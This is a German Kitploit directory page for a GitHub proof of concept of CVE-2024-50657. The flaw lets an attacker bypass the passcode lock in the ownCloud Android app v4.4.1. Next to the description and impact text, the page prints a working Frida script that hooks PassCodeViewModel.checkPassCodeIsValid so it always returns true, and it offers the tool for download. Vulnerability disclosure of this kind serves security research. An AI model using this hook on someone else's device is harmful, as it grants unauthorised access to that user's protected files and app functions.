Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50657 — Frida-basierter PoC, der eine fehlerhafte Zugriffskontrolle in der Owncloud-Android-APK v4.4.1 demonstriert und die Passcode-Validierung durch Hooking der checkPassCodeIsValid-Methode umgeht. | Kitploit
Tools/GitHubGitHub/sahalll/cve-2024-50657
Android-SicherheitSchwachstellenanalyseExploitationPenetrationstestsMobile Sicherheit
GitHubsahalll/cve-2024-50657

CVE-2024-50657

Frida-basierter PoC, der eine fehlerhafte Zugriffskontrolle in der Owncloud-Android-APK v4.4.1 demonstriert und die Passcode-Validierung durch Hooking der checkPassCodeIsValid-Methode umgeht.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50657:Inkorrekte Zugriffskontrolle in der Owncloud APK

Ein Problem in der Owncloud Android APK v.4.4.1 ermöglicht es einem physisch nahen Angreifer, Privilegien zu eskalieren über die PassCodeViewModel-Klasse, insbesondere in der Methode checkPassCodeIsValid.

Schwachstellentyp

Inkorrekte Zugriffskontrolle

Anbieter des Produkts

Owncloud

Betroffene Produkt-Codebasis

Owncloud android apk - 4.4.1

Betroffene Komponente

com.owncloud.android.presentation.security.passcode.PassCodeViewModel

Ausnutzung

Zielklasse und -Methode identifizieren:

Die Klasse PassCodeViewModel in der Anwendung verwaltet die Logik zur Passcode-Überprüfung. Die Methode checkPassCodeIsValid in dieser Klasse ist für die Bestimmung der Gültigkeit des eingegebenen Passcodes verantwortlich.

Abfangen der Methode mit Frida:

Ein Frida-Skript wird verwendet, um in die Methode checkPassCodeIsValid der Klasse PassCodeViewModel einzuhaken. Die Implementierung der Methode wird so geändert, dass sie immer true zurückgibt und so die tatsächliche Passcode-Überprüfung umgeht.

Ausführung:

Das Frida-Skript wird ausgeführt, während die App läuft. Jede Passcode-Eingabe des Benutzers wird als gültig akzeptiert, was unbefugten Zugriff ermöglicht.

PoC

Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true return true;

};

});

Video POC Link : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing

Auswirkungen:-

Diese Schwachstelle ist eine clientseitige Sicherheitsumgehungs-Schwachstelle. Sie betrifft Benutzer der Anwendung, die auf die Passcode-Funktion angewiesen sind, um sensible Daten zu schützen oder den Zugriff auf bestimmte App-Funktionen zu beschränken. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer die Passcode-Überprüfung umgehen und unbefugten Zugriff auf Bereiche der App erhalten, die geschützt sein sollten, was möglicherweise die Offenlegung von Benutzerdaten oder die Durchführung unbefugter Aktionen in der App zur Folge hat.

Tool herunterladen